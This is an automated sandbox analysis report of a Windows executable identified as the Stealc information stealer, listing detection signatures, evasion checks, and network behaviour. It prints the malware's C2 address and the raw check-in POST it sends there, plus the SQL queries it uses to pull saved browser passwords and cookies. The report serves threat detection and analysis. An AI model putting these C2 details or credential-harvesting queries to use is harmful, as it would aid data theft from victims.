Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1528316
MD5:e65a390d1393c0f3cba1b5bfd5bff188
SHA1:bc716b7d8d95ffc9eb04dd36e63fc829dc51f3fa
SHA256:4911b53e223f5d5d5781b45599cad59b5b2e6d82e03bcd33c7d72f6df95f7488
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7828 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E65A390D1393C0F3CBA1B5BFD5BFF188)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000001.00000003.1416396834.0000000005200000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7828JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7828JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              1.2.file.exe.850000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-07T19:14:13.177285+020020442431Malware Command and Control Activity Detected192.168.2.849706185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 1.2.file.exe.850000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0085C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,1_2_0085C820
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00859AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00859AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00857240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00857240
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00859B60 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00859B60
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00868EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_00868EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_008638B0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00864910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00864910
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0085DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0085DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0085E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0085E430
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0085ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_0085ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00864570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00864570
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00863EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00863EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0085F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0085F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_008516D0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0085DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0085DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0085BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0085BE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49706 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 35 36 32 38 41 30 32 39 38 46 32 39 36 33 34 39 35 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 2d 2d 0d 0a Data Ascii: ------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="hwid"AE5628A0298F2963495975------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="build"doma------IEHIIIJDAAAAAAKECBFB--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00856280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_00856280
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 35 36 32 38 41 30 32 39 38 46 32 39 36 33 34 39 35 39 37 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 2d 2d 0d 0a Data Ascii: ------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="hwid"AE5628A0298F2963495975------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="build"doma------IEHIIIJDAAAAAAKECBFB--
                Source: file.exe, 00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1472692554.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php5
                Source: file.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpW
                Source: file.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpYG
                Source: file.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phps
                Source: file.exe, 00000001.00000002.1472692554.0000000001609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.3793

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E1_2_00C2608E
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B3B8CC1_2_00B3B8CC
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2982C1_2_00C2982C
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C22A041_2_00C22A04
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AF1A761_2_00AF1A76
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C123C51_2_00C123C5
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B103EF1_2_00B103EF
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2B3AF1_2_00C2B3AF
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C244E71_2_00C244E7
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C27C241_2_00C27C24
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B05DF21_2_00B05DF2
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B2C6CF1_2_00B2C6CF
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00AF76241_2_00AF7624
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B7560E1_2_00B7560E
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2D7C01_2_00C2D7C0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C20F061_2_00C20F06
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 008545C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: edqomgnb ZLIB complexity 0.9947850689269747
                Source: file.exe, 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000001.00000003.1416396834.0000000005200000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00868680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_00868680
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00863720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,1_2_00863720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\6HZJYDZL.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT origin_url, username_value, password_value FROM logins;R,
                Source: file.exe, 00000001.00000002.1472692554.00000000015AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1873920 > 1048576
                Source: file.exeStatic PE information: Raw size of edqomgnb is bigger than: 0x100000 < 0x1a3600

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.850000.0.unpack :EW;.rsrc :W;.idata :W; :EW;edqomgnb:EW;cxwgayag:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;edqomgnb:EW;cxwgayag:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00869860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00869860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1d06a1 should be: 0x1ca4aa
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: edqomgnb
                Source: file.exeStatic PE information: section name: cxwgayag
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EFB0E9 push esi; mov dword ptr [esp], 4F955FE5h1_2_00EFB107
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EFB0E9 push 0561171Fh; mov dword ptr [esp], edx1_2_00EFB13E
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CB18EC push ebp; mov dword ptr [esp], edx1_2_00CB192F
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00CB18EC push eax; mov dword ptr [esp], ebx1_2_00CB19A2
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C978E4 push ebp; mov dword ptr [esp], 7E418912h1_2_00C9790E
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B4C0FF push 5B7DCAC0h; mov dword ptr [esp], ebx1_2_00B4C1B8
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B4C0FF push ecx; mov dword ptr [esp], edx1_2_00B4C1D2
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push 17BC7CC8h; mov dword ptr [esp], ebx1_2_00C26097
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push edi; mov dword ptr [esp], esi1_2_00C260D0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push 5AE59800h; mov dword ptr [esp], edi1_2_00C26133
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push ebx; mov dword ptr [esp], esi1_2_00C26137
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push 53FBE0B8h; mov dword ptr [esp], edi1_2_00C26168
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push 0875B4EBh; mov dword ptr [esp], ecx1_2_00C26346
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push eax; mov dword ptr [esp], edi1_2_00C263D4
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push edx; mov dword ptr [esp], 3BF65F38h1_2_00C26413
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push 3AD9833Ch; mov dword ptr [esp], edx1_2_00C2644F
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push ebx; mov dword ptr [esp], 37DDFDBEh1_2_00C26471
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push 47229E63h; mov dword ptr [esp], ebx1_2_00C264C1
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push ebx; mov dword ptr [esp], eax1_2_00C264ED
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push ebx; mov dword ptr [esp], ebp1_2_00C26552
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push 5035BFF1h; mov dword ptr [esp], esp1_2_00C26630
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push 43ACD927h; mov dword ptr [esp], edx1_2_00C2664F
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push eax; mov dword ptr [esp], 62DBFDDCh1_2_00C2666C
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push 6F65AFE4h; mov dword ptr [esp], edx1_2_00C2667B
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push 61C1CD9Ah; mov dword ptr [esp], ebx1_2_00C26710
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push eax; mov dword ptr [esp], edi1_2_00C26760
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push esi; mov dword ptr [esp], 1BCAF8BCh1_2_00C267DB
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push esi; mov dword ptr [esp], eax1_2_00C267F2
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push edi; mov dword ptr [esp], eax1_2_00C2693C
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push 102AAC7Fh; mov dword ptr [esp], ecx1_2_00C2699A
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00C2608E push edx; mov dword ptr [esp], ebp1_2_00C26A00
                Source: file.exeStatic PE information: section name: edqomgnb entropy: 7.953527628091509

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00869860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00869860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_1-13698
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB1FC1 second address: AB1FC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2C8CD second address: C2C8DB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F68950EC3B8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C30F37 second address: C30F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C31390 second address: C31394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C31394 second address: C313A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F68950E7986h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C35129 second address: C35167 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F68950EC3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e jmp 00007F68950EC3C0h 0x00000013 pop ebx 0x00000014 push edi 0x00000015 jmp 00007F68950EC3C2h 0x0000001a pop edi 0x0000001b popad 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 pop edi 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C35167 second address: C3516D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
